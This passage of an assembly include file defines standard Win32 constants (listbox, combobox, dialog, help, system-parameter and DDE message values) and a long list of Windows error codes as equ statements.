BM_GETSTATE equ 0F2h
BM_SETSTATE equ 0F3h
BM_SETSTYLE equ 0F4h
BM_CLICK equ 0F5h
BM_GETIMAGE equ 0F6h
BM_SETIMAGE equ 0F7h
SS_LEFT equ 0h
SS_CENTER equ 1h
SS_RIGHT equ 2h
SS_ICON equ 3h
SS_BLACKRECT equ 4h
SS_GRAYRECT equ 5h
SS_WHITERECT equ 6h
SS_BLACKFRAME equ 7h
SS_GRAYFRAME equ 8h
SS_WHITEFRAME equ 9h
SS_USERITEM equ 0Ah
SS_SIMPLE equ 0Bh
SS_LEFTNOWORDWRAP equ 0Ch
SS_NOPREFIX equ 80h
STM_SETICON equ 170h
STM_GETICON equ 171h
STM_MSGMAX equ 172h
WC_DIALOG equ 8002h
DWL_MSGRESULT equ 0
DWL_DLGPROC equ 4
DWL_USER equ 8
DDL_READWRITE equ 0h
DDL_READONLY equ 1h
DDL_HIDDEN equ 2h
DDL_SYSTEM equ 4h
DDL_DIRECTORY equ 10h
DDL_ARCHIVE equ 20h
DDL_POSTMSGS equ 2000h
DDL_DRIVES equ 4000h
DDL_EXCLUSIVE equ 8000h
DS_ABSALIGN equ 0001h
DS_SYSMODAL equ 0002h
DS_3DLOOK equ 0004h
DS_FIXEDSYS equ 0008h
DS_NOFAILCREATE equ 0010h
DS_LOCALEDIT equ 0020h
DS_SETFONT equ 0040h
DS_MODALFRAME equ 0080h
DS_NOIDLEMSG equ 0100h
DS_SETFOREGROUND equ 0200h
DS_CONTROL equ 0400h
DS_CENTER equ 0800h
DS_CENTERMOUSE equ 1000h
DS_CONTEXTHELP equ 2000h
DM_GETDEFID equ WM_USER+0
DM_SETDEFID equ WM_USER+1
DC_HASDEFID equ 534h
DLGC_WANTARROWS equ 1h
DLGC_WANTTAB equ 2h
DLGC_WANTALLKEYS equ 4h
DLGC_WANTMESSAGE equ 4h
DLGC_HASSETSEL equ 8h
DLGC_DEFPUSHBUTTON equ 10h
DLGC_UNDEFPUSHBUTTON equ 20h
DLGC_RADIOBUTTON equ 40h
DLGC_WANTCHARS equ 80h
DLGC_STATIC equ 100h
DLGC_BUTTON equ 2000h
LB_CTLCODE equ 0
LB_OKAY equ 0
LB_ERR equ -1
LB_ERRSPACE equ -2
LBN_ERRSPACE equ -2
LBN_SELCHANGE equ 1
LBN_DBLCLK equ 2
LBN_SELCANCEL equ 3
LBN_SETFOCUS equ 4
LBN_KILLFOCUS equ 5
LB_ADDSTRING equ 180h
LB_INSERTSTRING equ 181h
LB_DELETESTRING equ 182h
LB_SELITEMRANGEEX equ 183h
LB_RESETCONTENT equ 184h
LB_SETSEL equ 185h
LB_SETCURSEL equ 186h
LB_GETSEL equ 187h
LB_GETCURSEL equ 188h
LB_GETTEXT equ 189h
LB_GETTEXTLEN equ 18Ah
LB_GETCOUNT equ 18Bh
LB_SELECTSTRING equ 18Ch
LB_DIR equ 18Dh
LB_GETTOPINDEX equ 18Eh
LB_FINDSTRING equ 18Fh
LB_GETSELCOUNT equ 190h
LB_GETSELITEMS equ 191h
LB_SETTABSTOPS equ 192h
LB_GETHORIZONTALEXTENT equ 193h
LB_SETHORIZONTALEXTENT equ 194h
LB_SETCOLUMNWIDTH equ 195h
LB_ADDFILE equ 196h
LB_SETTOPINDEX equ 197h
LB_GETITEMRECT equ 198h
LB_GETITEMDATA equ 199h
LB_SETITEMDATA equ 19Ah
LB_SELITEMRANGE equ 19Bh
LB_SETANCHORINDEX equ 19Ch
LB_GETANCHORINDEX equ 19Dh
LB_SETCARETINDEX equ 19Eh
LB_GETCARETINDEX equ 19Fh
LB_SETITEMHEIGHT equ 1A0h
LB_GETITEMHEIGHT equ 1A1h
LB_FINDSTRINGEXACT equ 1A2h
LB_SETLOCALE equ 1A5h
LB_GETLOCALE equ 1A6h
LB_SETCOUNT equ 1A7h
LB_MSGMAX equ 1A8h
LBS_NOTIFY equ 1h
LBS_SORT equ 2h
LBS_NOREDRAW equ 4h
LBS_MULTIPLESEL equ 8h
LBS_OWNERDRAWFIXED equ 10h
LBS_OWNERDRAWVARIABLE equ 20h
LBS_HASSTRINGS equ 40h
LBS_USETABSTOPS equ 80h
LBS_NOINTEGRALHEIGHT equ 100h
LBS_MULTICOLUMN equ 200h
LBS_WANTKEYBOARDINPUT equ 400h
LBS_EXTENDEDSEL equ 800h
LBS_DISABLENOSCROLL equ 1000h
LBS_NODATA equ 2000h
LBS_STANDARD equ LBS_NOTIFY|LBS_SORT|WS_VSCROLL|WS_BORDER
CB_OKAY equ 0
CB_ERR equ -1
CB_ERRSPACE equ -2
CBN_ERRSPACE equ -1
CBN_SELCHANGE equ 1
CBN_DBLCLK equ 2
CBN_SETFOCUS equ 3
CBN_KILLFOCUS equ 4
CBN_EDITCHANGE equ 5
CBN_EDITUPDATE equ 6
CBN_DROPDOWN equ 7
CBN_CLOSEUP equ 8
CBN_SELENDOK equ 9
CBN_SELENDCANCEL equ 10
CBS_SIMPLE equ 1h
CBS_DROPDOWN equ 2h
CBS_DROPDOWNLIST equ 3h
CBS_OWNERDRAWFIXED equ 10h
CBS_OWNERDRAWVARIABLE equ 20h
CBS_AUTOHSCROLL equ 40h
CBS_OEMCONVERT equ 80h
CBS_SORT equ 100h
CBS_HASSTRINGS equ 200h
CBS_NOINTEGRALHEIGHT equ 400h
CBS_DISABLENOSCROLL equ 800h
CB_GETEDITSEL equ 140h
CB_LIMITTEXT equ 141h
CB_SETEDITSEL equ 142h
CB_ADDSTRING equ 143h
CB_DELETESTRING equ 144h
CB_DIR equ 145h
CB_GETCOUNT equ 146h
CB_GETCURSEL equ 147h
CB_GETLBTEXT equ 148h
CB_GETLBTEXTLEN equ 149h
CB_INSERTSTRING equ 14Ah
CB_RESETCONTENT equ 14Bh
CB_FINDSTRING equ 14Ch
CB_SELECTSTRING equ 14Dh
CB_SETCURSEL equ 14Eh
CB_SHOWDROPDOWN equ 14Fh
CB_GETITEMDATA equ 150h
CB_SETITEMDATA equ 151h
CB_GETDROPPEDCONTROLRECT equ 152h
CB_SETITEMHEIGHT equ 153h
CB_GETITEMHEIGHT equ 154h
CB_SETEXTENDEDUI equ 155h
CB_GETEXTENDEDUI equ 156h
CB_GETDROPPEDSTATE equ 157h
CB_FINDSTRINGEXACT equ 158h
CB_SETLOCALE equ 159h
CB_GETLOCALE equ 15Ah
CB_GETTOPINDEX equ 15Bh
CB_SETTOPINDEX equ 15Ch
CB_GETHORIZONTALEXTENT equ 15Dh
CB_SETHORIZONTALEXTENT equ 15Eh
CB_GETDROPPEDWIDTH equ 15Fh
CB_SETDROPPEDWIDTH equ 160h
CB_INITSTORAGE equ 161h
CB_MSGMAX equ 162h
SBS_HORZ equ 0h
SBS_VERT equ 1h
SBS_TOPALIGN equ 2h
SBS_LEFTALIGN equ 2h
SBS_BOTTOMALIGN equ 4h
SBS_RIGHTALIGN equ 4h
SBS_SIZEBOXTOPLEFTALIGN equ 2h
SBS_SIZEBOXBOTTOMRIGHTALIGN equ 4h
SBS_SIZEBOX equ 8h
SBS_SIZEGRIP equ 10h
SBM_SETPOS equ 0E0h
SBM_GETPOS equ 0E1h
SBM_SETRANGE equ 0E2h
SBM_SETRANGEREDRAW equ 0E6h
SBM_GETRANGE equ 0E3h
SBM_ENABLE_ARROWS equ 0E4h
MDIS_ALLCHILDSTYLES equ 1h
MDITILE_VERTICAL equ 0h
MDITILE_HORIZONTAL equ 1h
MDITILE_SKIPDISABLED equ 2h
HELP_CONTEXT equ 1h
HELP_QUIT equ 2h
HELP_INDEX equ 3h
HELP_CONTENTS equ 3h
HELP_HELPONHELP equ 4h
HELP_SETINDEX equ 5h
HELP_SETCONTENTS equ 5h
HELP_CONTEXTPOPUP equ 8h
HELP_FORCEFILE equ 9h
HELP_KEY equ 101h
HELP_COMMAND equ 102h
HELP_PARTIALKEY equ 105h
HELP_MULTIKEY equ 201h
HELP_SETWINPOS equ 203h
HELP_CONTEXTMENU equ 000Ah
HELP_FINDER equ 000Bh
HELP_WM_HELP equ 000Ch
HELP_SETPOPUP_POS equ 000Dh
HELP_TCARD equ 8000h
HELP_TCARD_DATA equ 0010h
HELP_TCARD_OTHER_CALLER equ 0011h
IDH_NO_HELP equ 28440
IDH_MISSING_CONTEXT equ 28441
IDH_GENERIC_HELP_BUTTON equ 28442
IDH_OK equ 28443
IDH_CANCEL equ 28444
IDH_HELP equ 28445
SPI_GETBEEP equ 1
SPI_SETBEEP equ 2
SPI_GETMOUSE equ 3
SPI_SETMOUSE equ 4
SPI_GETBORDER equ 5
SPI_SETBORDER equ 6
SPI_GETKEYBOARDSPEED equ 10
SPI_SETKEYBOARDSPEED equ 11
SPI_LANGDRIVER equ 12
SPI_ICONHORIZONTALSPACING equ 13
SPI_GETSCREENSAVETIMEOUT equ 14
SPI_SETSCREENSAVETIMEOUT equ 15
SPI_GETSCREENSAVEACTIVE equ 16
SPI_SETSCREENSAVEACTIVE equ 17
SPI_GETGRIDGRANULARITY equ 18
SPI_SETGRIDGRANULARITY equ 19
SPI_SETDESKWALLPAPER equ 20
SPI_SETDESKPATTERN equ 21
SPI_GETKEYBOARDDELAY equ 22
SPI_SETKEYBOARDDELAY equ 23
SPI_ICONVERTICALSPACING equ 24
SPI_GETICONTITLEWRAP equ 25
SPI_SETICONTITLEWRAP equ 26
SPI_GETMENUDROPALIGNMENT equ 27
SPI_SETMENUDROPALIGNMENT equ 28
SPI_SETDOUBLECLKWIDTH equ 29
SPI_SETDOUBLECLKHEIGHT equ 30
SPI_GETICONTITLELOGFONT equ 31
SPI_SETDOUBLECLICKTIME equ 32
SPI_SETMOUSEBUTTONSWAP equ 33
SPI_SETICONTITLELOGFONT equ 34
SPI_GETFASTTASKSWITCH equ 35
SPI_SETFASTTASKSWITCH equ 36
SPI_SETDRAGFULLWINDOWS equ 37
SPI_GETDRAGFULLWINDOWS equ 38
SPI_GETNONCLIENTMETRICS equ 41
SPI_SETNONCLIENTMETRICS equ 42
SPI_GETMINIMIZEDMETRICS equ 43
SPI_SETMINIMIZEDMETRICS equ 44
SPI_GETICONMETRICS equ 45
SPI_SETICONMETRICS equ 46
SPI_SETWORKAREA equ 47
SPI_GETWORKAREA equ 48
SPI_SETPENWINDOWS equ 49
SPI_GETFILTERKEYS equ 50
SPI_SETFILTERKEYS equ 51
SPI_GETTOGGLEKEYS equ 52
SPI_SETTOGGLEKEYS equ 53
SPI_GETMOUSEKEYS equ 54
SPI_SETMOUSEKEYS equ 55
SPI_GETSHOWSOUNDS equ 56
SPI_SETSHOWSOUNDS equ 57
SPI_GETSTICKYKEYS equ 58
SPI_SETSTICKYKEYS equ 59
SPI_GETACCESSTIMEOUT equ 60
SPI_SETACCESSTIMEOUT equ 61
SPI_GETSERIALKEYS equ 62
SPI_SETSERIALKEYS equ 63
SPI_GETSOUNDSENTRY equ 64
SPI_SETSOUNDSENTRY equ 65
SPI_GETHIGHCONTRAST equ 66
SPI_SETHIGHCONTRAST equ 67
SPI_GETKEYBOARDPREF equ 68
SPI_SETKEYBOARDPREF equ 69
SPI_GETSCREENREADER equ 70
SPI_SETSCREENREADER equ 71
SPI_GETANIMATION equ 72
SPI_SETANIMATION equ 73
SPI_GETFONTSMOOTHING equ 74
SPI_SETFONTSMOOTHING equ 75
SPI_SETDRAGWIDTH equ 76
SPI_SETDRAGHEIGHT equ 77
SPI_SETHANDHELD equ 78
SPI_GETLOWPOWERTIMEOUT equ 79
SPI_GETPOWEROFFTIMEOUT equ 80
SPI_SETLOWPOWERTIMEOUT equ 81
SPI_SETPOWEROFFTIMEOUT equ 82
SPI_GETLOWPOWERACTIVE equ 83
SPI_GETPOWEROFFACTIVE equ 84
SPI_SETLOWPOWERACTIVE equ 85
SPI_SETPOWEROFFACTIVE equ 86
SPI_SETCURSORS equ 87
SPI_SETICONS equ 88
SPI_GETDEFAULTINPUTLANG equ 89
SPI_SETDEFAULTINPUTLANG equ 90
SPI_SETLANGTOGGLE equ 91
SPI_GETWINDOWSEXTENSION equ 92
SPI_SETMOUSETRAILS equ 93
SPI_GETMOUSETRAILS equ 94
SPI_SCREENSAVERRUNNING equ 97
SPIF_UPDATEINIFILE equ 1h
SPIF_SENDWININICHANGE equ 2h
WM_DDE_FIRST equ 3E0h
WM_DDE_INITIATE equ WM_DDE_FIRST
WM_DDE_TERMINATE equ WM_DDE_FIRST+1
WM_DDE_ADVISE equ WM_DDE_FIRST+2
WM_DDE_UNADVISE equ WM_DDE_FIRST+3
WM_DDE_ACK equ WM_DDE_FIRST+4
WM_DDE_DATA equ WM_DDE_FIRST+5
WM_DDE_REQUEST equ WM_DDE_FIRST+6
WM_DDE_POKE equ WM_DDE_FIRST+7
WM_DDE_EXECUTE equ WM_DDE_FIRST+8
WM_DDE_LAST equ WM_DDE_FIRST+8
XST_NULL equ 0
XST_INCOMPLETE equ 1
XST_CONNECTED equ 2
XST_INIT1 equ 3
XST_INIT2 equ 4
XST_REQSENT equ 5
XST_DATARCVD equ 6
XST_POKESENT equ 7
XST_POKEACKRCVD equ 8
XST_EXECSENT equ 9
XST_EXECACKRCVD equ 10
XST_ADVSENT equ 11
XST_UNADVSENT equ 12
XST_ADVACKRCVD equ 13
XST_UNADVACKRCVD equ 14
XST_ADVDATASENT equ 15
XST_ADVDATAACKRCVD equ 16
CADV_LATEACK equ 0FFFFh
ST_CONNECTED equ 1h
ST_ADVISE equ 2h
ST_ISLOCAL equ 4h
ST_BLOCKED equ 8h
ST_CLIENT equ 10h
ST_TERMINATED equ 20h
ST_INLIST equ 40h
ST_BLOCKNEXT equ 80h
ST_ISSELF equ 100h
DDE_FACK equ 8000h
DDE_FBUSY equ 4000h
DDE_FDEFERUPD equ 4000h
DDE_FACKREQ equ 8000h
DDE_FRELEASE equ 2000h
DDE_FREQUESTED equ 1000h
DDE_FAPPSTATUS equ 0FFh
DDE_FNOTPROCESSED equ 0h
DDE_FACKRESERVED equ (-1-(DDE_FACK|DDE_FBUSY|DDE_FAPPSTATUS))
DDE_FADVRESERVED equ (-1-(DDE_FACKREQ|DDE_FDEFERUPD))
DDE_FDATRESERVED equ (-1-(DDE_FACKREQ|DDE_FRELEASE|DDE_FREQUESTED))
DDE_FPOKRESERVED equ (-1-DDE_FRELEASE)
CP_WINANSI equ 1004
CP_WINUNICODE equ 1200
XTYPF_NOBLOCK equ 2h
XTYPF_NODATA equ 4h
XTYPF_ACKREQ equ 8h
XCLASS_MASK equ 0FC00h
XCLASS_BOOL equ 1000h
XCLASS_DATA equ 2000h
XCLASS_FLAGS equ 4000h
XCLASS_NOTIFICATION equ 8000h
XTYP_ERROR equ 0h|XCLASS_NOTIFICATION|XTYPF_NOBLOCK
XTYP_ADVDATA equ 10h|XCLASS_FLAGS
XTYP_ADVREQ equ 20h|XCLASS_DATA|XTYPF_NOBLOCK
XTYP_ADVSTART equ 30h|XCLASS_BOOL
XTYP_ADVSTOP equ 40h|XCLASS_NOTIFICATION
XTYP_EXECUTE equ 50h|XCLASS_FLAGS
XTYP_CONNECT equ 60h|XCLASS_BOOL|XTYPF_NOBLOCK
XTYP_CONNECT_CONFIRM equ 70h|XCLASS_NOTIFICATION|XTYPF_NOBLOCK
XTYP_XACT_COMPLETE equ 80h|XCLASS_NOTIFICATION
XTYP_POKE equ 90h|XCLASS_FLAGS
XTYP_REGISTER equ 0A0h|XCLASS_NOTIFICATION|XTYPF_NOBLOCK
XTYP_REQUEST equ 0B0h|XCLASS_DATA
XTYP_DISCONNECT equ 0C0h|XCLASS_NOTIFICATION|XTYPF_NOBLOCK
XTYP_UNREGISTER equ 0D0h|XCLASS_NOTIFICATION|XTYPF_NOBLOCK
XTYP_WILDCONNECT equ 0E0h|XCLASS_DATA|XTYPF_NOBLOCK
XTYP_MASK equ 0F0h
XTYP_SHIFT equ 4
TIMEOUT_ASYNC equ 0FFFFh
QID_SYNC equ 0FFFFh
CBR_BLOCK equ 0FFFFh
CBF_FAIL_SELFCONNECTIONS equ 1000h
CBF_FAIL_CONNECTIONS equ 2000h
CBF_FAIL_ADVISES equ 4000h
CBF_FAIL_EXECUTES equ 8000h
CBF_FAIL_POKES equ 10000h
CBF_FAIL_REQUESTS equ 20000h
CBF_FAIL_ALLSVRXACTIONS equ 3F000h
CBF_SKIP_CONNECT_CONFIRMS equ 40000h
CBF_SKIP_REGISTRATIONS equ 80000h
CBF_SKIP_UNREGISTRATIONS equ 100000h
CBF_SKIP_DISCONNECTS equ 200000h
CBF_SKIP_ALLNOTIFICATIONS equ 3C0000h
APPCMD_CLIENTONLY equ 10h
APPCMD_FILTERINITS equ 20h
APPCMD_MASK equ 0FF0h
APPCLASS_STANDARD equ 0h
APPCLASS_MASK equ 0Fh
EC_ENABLEALL equ 0
EC_ENABLEONE equ ST_BLOCKNEXT
EC_DISABLE equ ST_BLOCKED
EC_QUERYWAITING equ 2
DNS_REGISTER equ 1h
DNS_UNREGISTER equ 2h
DNS_FILTERON equ 4h
DNS_FILTEROFF equ 8h
HDATA_APPOWNED equ 1h
DMLERR_NO_ERROR equ 0
DMLERR_FIRST equ 4000h
DMLERR_ADVACKTIMEOUT equ 4000h
DMLERR_BUSY equ 4001h
DMLERR_DATAACKTIMEOUT equ 4002h
DMLERR_DLL_NOT_INITIALIZED equ 4003h
DMLERR_DLL_USAGE equ 4004h
DMLERR_EXECACKTIMEOUT equ 4005h
DMLERR_INVALIDPARAMETER equ 4006h
DMLERR_LOW_MEMORY equ 4007h
DMLERR_MEMORY_ERROR equ 4008h
DMLERR_NOTPROCESSED equ 4009h
DMLERR_NO_CONV_ESTABLISHED equ 400Ah
DMLERR_POKEACKTIMEOUT equ 400Bh
DMLERR_POSTMSG_FAILED equ 400Ch
DMLERR_REENTRANCY equ 400Dh
DMLERR_SERVER_DIED equ 400Eh
DMLERR_SYS_ERROR equ 400Fh
DMLERR_UNADVACKTIMEOUT equ 4010h
DMLERR_UNFOUND_QUEUE_ID equ 4011h
DMLERR_LAST equ 4011h
MH_CREATE equ 1
MH_KEEP equ 2
MH_DELETE equ 3
MH_CLEANUP equ 4
MAX_MONITORS equ 4
APPCLASS_MONITOR equ 1h
XTYP_MONITOR equ 0F0h|XCLASS_NOTIFICATION|XTYPF_NOBLOCK
MF_HSZ_INFO equ 1000000h
MF_SENDMSGS equ 2000000h
MF_POSTMSGS equ 4000000h
MF_CALLBACKS equ 8000000h
MF_ERRORS equ 10000000h
MF_LINKS equ 20000000h
MF_CONV equ 40000000h
MF_MASK equ 0FF000000h
NO_ERROR equ 0
ERROR_SUCCESS equ 0
ERROR_INVALID_FUNCTION equ 1
ERROR_FILE_NOT_FOUND equ 2
ERROR_PATH_NOT_FOUND equ 3
ERROR_TOO_MANY_OPEN_FILES equ 4
ERROR_ACCESS_DENIED equ 5
ERROR_INVALID_HANDLE equ 6
ERROR_ARENA_TRASHED equ 7
ERROR_NOT_ENOUGH_MEMORY equ 8
ERROR_INVALID_BLOCK equ 9
ERROR_BAD_ENVIRONMENT equ 10
ERROR_BAD_FORMAT equ 11
ERROR_INVALID_ACCESS equ 12
ERROR_INVALID_DATA equ 13
ERROR_OUTOFMEMORY equ 14
ERROR_INVALID_DRIVE equ 15
ERROR_CURRENT_DIRECTORY equ 16
ERROR_NOT_SAME_DEVICE equ 17
ERROR_NO_MORE_FILES equ 18
ERROR_WRITE_PROTECT equ 19
ERROR_BAD_UNIT equ 20
ERROR_NOT_READY equ 21
ERROR_BAD_COMMAND equ 22
ERROR_CRC equ 23
ERROR_BAD_LENGTH equ 24
ERROR_SEEK equ 25
ERROR_NOT_DOS_DISK equ 26
ERROR_SECTOR_NOT_FOUND equ 27
ERROR_OUT_OF_PAPER equ 28
ERROR_WRITE_FAULT equ 29
ERROR_READ_FAULT equ 30
ERROR_GEN_FAILURE equ 31
ERROR_SHARING_VIOLATION equ 32
ERROR_LOCK_VIOLATION equ 33
ERROR_WRONG_DISK equ 34
ERROR_SHARING_BUFFER_EXCEEDED equ 36
ERROR_HANDLE_EOF equ 38
ERROR_HANDLE_DISK_FULL equ 39
ERROR_NOT_SUPPORTED equ 50
ERROR_REM_NOT_LIST equ 51
ERROR_DUP_NAME equ 52
ERROR_BAD_NETPATH equ 53
ERROR_NETWORK_BUSY equ 54
ERROR_DEV_NOT_EXIST equ 55
ERROR_TOO_MANY_CMDS equ 56
ERROR_ADAP_HDW_ERR equ 57
ERROR_BAD_NET_RESP equ 58
ERROR_UNEXP_NET_ERR equ 59
ERROR_BAD_REM_ADAP equ 60
ERROR_PRINTQ_FULL equ 61
ERROR_NO_SPOOL_SPACE equ 62
ERROR_PRINT_CANCELLED equ 63
ERROR_NETNAME_DELETED equ 64
ERROR_NETWORK_ACCESS_DENIED equ 65
ERROR_BAD_DEV_TYPE equ 66
ERROR_BAD_NET_NAME equ 67
ERROR_TOO_MANY_NAMES equ 68
ERROR_TOO_MANY_SESS equ 69
ERROR_SHARING_PAUSED equ 70
ERROR_REQ_NOT_ACCEP equ 71
ERROR_REDIR_PAUSED equ 72
ERROR_FILE_EXISTS equ 80
ERROR_CANNOT_MAKE equ 82
ERROR_FAIL_I24 equ 83
ERROR_OUT_OF_STRUCTURES equ 84
ERROR_ALREADY_ASSIGNED equ 85
ERROR_INVALID_PASSWORD equ 86
ERROR_INVALID_PARAMETER equ 87
ERROR_NET_WRITE_FAULT equ 88
ERROR_NO_PROC_SLOTS equ 89
ERROR_TOO_MANY_SEMAPHORES equ 100
ERROR_EXCL_SEM_ALREADY_OWNED equ 101
ERROR_SEM_IS_SET equ 102
ERROR_TOO_MANY_SEM_REQUESTS equ 103
ERROR_INVALID_AT_INTERRUPT_TIME equ 104
ERROR_SEM_OWNER_DIED equ 105
ERROR_SEM_USER_LIMIT equ 106
ERROR_DISK_CHANGE equ 107
ERROR_DRIVE_LOCKED equ 108
ERROR_BROKEN_PIPE equ 109
ERROR_OPEN_FAILED equ 110
ERROR_BUFFER_OVERFLOW equ 111
ERROR_DISK_FULL equ 112
ERROR_NO_MORE_SEARCH_HANDLES equ 113
ERROR_INVALID_TARGET_HANDLE equ 114
ERROR_INVALID_CATEGORY equ 117
ERROR_INVALID_VERIFY_SWITCH equ 118
ERROR_BAD_DRIVER_LEVEL equ 119
ERROR_CALL_NOT_IMPLEMENTED equ 120
ERROR_SEM_TIMEOUT equ 121
ERROR_INSUFFICIENT_BUFFER equ 122
ERROR_INVALID_NAME equ 123
ERROR_INVALID_LEVEL equ 124
ERROR_NO_VOLUME_LABEL equ 125
ERROR_MOD_NOT_FOUND equ 126
ERROR_PROC_NOT_FOUND equ 127
ERROR_WAIT_NO_CHILDREN equ 128
ERROR_CHILD_NOT_COMPLETE equ 129
ERROR_DIRECT_ACCESS_HANDLE equ 130
ERROR_NEGATIVE_SEEK equ 131
ERROR_SEEK_ON_DEVICE equ 132
ERROR_IS_JOIN_TARGET equ 133
ERROR_IS_JOINED equ 134
ERROR_IS_SUBSTED equ 135
ERROR_NOT_JOINED equ 136
ERROR_NOT_SUBSTED equ 137
ERROR_JOIN_TO_JOIN equ 138
ERROR_SUBST_TO_SUBST equ 139
ERROR_JOIN_TO_SUBST equ 140
ERROR_SUBST_TO_JOIN equ 141
ERROR_BUSY_DRIVE equ 142
ERROR_SAME_DRIVE equ 143
ERROR_DIR_NOT_ROOT equ 144
ERROR_DIR_NOT_EMPTY equ 145
ERROR_IS_SUBST_PATH equ 146
ERROR_IS_JOIN_PATH equ 147
ERROR_PATH_BUSY equ 148
ERROR_IS_SUBST_TARGET equ 149
ERROR_SYSTEM_TRACE equ 150
ERROR_INVALID_EVENT_COUNT equ 151
ERROR_TOO_MANY_MUXWAITERS equ 152
ERROR_INVALID_LIST_FORMAT equ 153
ERROR_LABEL_TOO_LONG equ 154
ERROR_TOO_MANY_TCBS equ 155
ERROR_SIGNAL_REFUSED equ 156
ERROR_DISCARDED equ 157
ERROR_NOT_LOCKED equ 158
ERROR_BAD_THREADID_ADDR equ 159
ERROR_BAD_ARGUMENTS equ 160
ERROR_BAD_PATHNAME equ 161
ERROR_SIGNAL_PENDING equ 162
ERROR_MAX_THRDS_REACHED equ 164
ERROR_LOCK_FAILED equ 167
ERROR_BUSY equ 170
ERROR_CANCEL_VIOLATION equ 173
ERROR_ATOMIC_LOCKS_NOT_SUPPORTED equ 174
ERROR_INVALID_SEGMENT_NUMBER equ 180
ERROR_INVALID_ORDINAL equ 182
ERROR_ALREADY_EXISTS equ 183
ERROR_INVALID_FLAG_NUMBER equ 186
ERROR_SEM_NOT_FOUND equ 187
ERROR_INVALID_STARTING_CODESEG equ 188
ERROR_INVALID_STACKSEG equ 189
ERROR_INVALID_MODULETYPE equ 190
ERROR_INVALID_EXE_SIGNATURE equ 191
ERROR_EXE_MARKED_INVALID equ 192
ERROR_BAD_EXE_FORMAT equ 193
ERROR_ITERATED_DATA_EXCEEDS_64k equ 194
ERROR_INVALID_MINALLOCSIZE equ 195
ERROR_DYNLINK_FROM_INVALID_RING equ 196
ERROR_IOPL_NOT_ENABLED equ 197
ERROR_INVALID_SEGDPL equ 198
ERROR_AUTODATASEG_EXCEEDS_64k equ 199
ERROR_RING2SEG_MUST_BE_MOVABLE equ 200
ERROR_RELOC_CHAIN_XEEDS_SEGLIM equ 201
ERROR_INFLOOP_IN_RELOC_CHAIN equ 202
ERROR_ENVVAR_NOT_FOUND equ 203
ERROR_NO_SIGNAL_SENT equ 205
ERROR_FILENAME_EXCED_RANGE equ 206
ERROR_RING2_STACK_IN_USE equ 207
ERROR_META_EXPANSION_TOO_LONG equ 208
ERROR_INVALID_SIGNAL_NUMBER equ 209
ERROR_THREAD_1_INACTIVE equ 210
ERROR_LOCKED equ 212
ERROR_TOO_MANY_MODULES equ 214
ERROR_NESTING_NOT_ALLOWED equ 215
ERROR_BAD_PIPE equ 230
ERROR_PIPE_BUSY equ 231
ERROR_NO_DATA equ 232
ERROR_PIPE_NOT_CONNECTED equ 233
ERROR_MORE_DATA equ 234
ERROR_VC_DISCONNECTED equ 240
ERROR_INVALID_EA_NAME equ 254
ERROR_EA_LIST_INCONSISTENT equ 255
ERROR_NO_MORE_ITEMS equ 259
ERROR_CANNOT_COPY equ 266
ERROR_DIRECTORY equ 267
ERROR_EAS_DIDNT_FIT equ 275
ERROR_EA_FILE_CORRUPT equ 276
ERROR_EA_TABLE_FULL equ 277
ERROR_INVALID_EA_HANDLE equ 278
ERROR_EAS_NOT_SUPPORTED equ 282
ERROR_NOT_OWNER equ 288
ERROR_TOO_MANY_POSTS equ 298
ERROR_MR_MID_NOT_FOUND equ 317
ERROR_INVALID_ADDRESS equ 487
ERROR_ARITHMETIC_OVERFLOW equ 534
ERROR_PIPE_CONNECTED equ 535
ERROR_PIPE_LISTENING equ 536
ERROR_EA_ACCESS_DENIED equ 994
ERROR_OPERATION_ABORTED equ 995
ERROR_IO_INCOMPLETE equ 996
ERROR_IO_PENDING equ 997
ERROR_NOACCESS equ 998
ERROR_SWAPERROR equ 999
ERROR_STACK_OVERFLOW equ 1001
ERROR_INVALID_MESSAGE equ 1002
ERROR_CAN_NOT_COMPLETE equ 1003
ERROR_INVALID_FLAGS equ 1004
ERROR_UNRECOGNIZED_VOLUME equ 1005
ERROR_FILE_INVALID equ 1006
ERROR_FULLSCREEN_MODE equ 1007
ERROR_NO_TOKEN equ 1008
ERROR_BADDB equ 1009
ERROR_BADKEY equ 1010
ERROR_CANTOPEN equ 1011
ERROR_CANTREAD equ 1012
ERROR_CANTWRITE equ 1013
ERROR_REGISTRY_RECOVERED equ 1014
ERROR_REGISTRY_CORRUPT equ 1015
ERROR_REGISTRY_IO_FAILED equ 1016
ERROR_NOT_REGISTRY_FILE equ 1017
ERROR_KEY_DELETED equ 1018
ERROR_NO_LOG_SPACE equ 1019
ERROR_KEY_HAS_CHILDREN equ 1020
ERROR_CHILD_MUST_BE_VOLATILE equ 1021
ERROR_NOTIFY_ENUM_DIR equ 1022
ERROR_DEPENDENT_SERVICES_RUNNING equ 1051
ERROR_INVALID_SERVICE_CONTROL equ 1052
ERROR_SERVICE_REQUEST_TIMEOUT equ 1053
ERROR_SERVICE_NO_THREAD equ 1054
ERROR_SERVICE_DATABASE_LOCKED equ 1055
ERROR_SERVICE_ALREADY_RUNNING equ 1056
ERROR_INVALID_SERVICE_ACCOUNT equ 1057
ERROR_SERVICE_DISABLED equ 1058
ERROR_CIRCULAR_DEPENDENCY equ 1059
ERROR_SERVICE_DOES_NOT_EXIST equ 1060
ERROR_SERVICE_CANNOT_ACCEPT_CTRL equ 1061
ERROR_SERVICE_NOT_ACTIVE equ 1062
ERROR_FAILED_SERVICE_CONTROLLER_CONNECT equ 1063
ERROR_EXCEPTION_IN_SERVICE equ 1064
ERROR_DATABASE_DOES_NOT_EXIST equ 1065
ERROR_SERVICE_SPECIFIC_ERROR equ 1066
ERROR_PROCESS_ABORTED equ 1067
ERROR_SERVICE_DEPENDENCY_FAIL equ 1068
ERROR_SERVICE_LOGON_FAILED equ 1069
ERROR_SERVICE_START_HANG equ 1070
ERROR_INVALID_SERVICE_LOCK equ 1071
ERROR_SERVICE_MARKED_FOR_DELETE equ 1072
ERROR_SERVICE_EXISTS equ 1073
ERROR_ALREADY_RUNNING_LKG equ 1074
ERROR_SERVICE_DEPENDENCY_DELETED equ 1075
ERROR_BOOT_ALREADY_ACCEPTED equ 1076
ERROR_SERVICE_NEVER_STARTED equ 1077
ERROR_DUPLICATE_SERVICE_NAME equ 1078
ERROR_END_OF_MEDIA equ 1100
ERROR_FILEMARK_DETECTED equ 1101
ERROR_BEGINNING_OF_MEDIA equ 1102
ERROR_SETMARK_DETECTED equ 1103
ERROR_NO_DATA_DETECTED equ 1104
ERROR_PARTITION_FAILURE equ 1105
ERROR_INVALID_BLOCK_LENGTH equ 1106
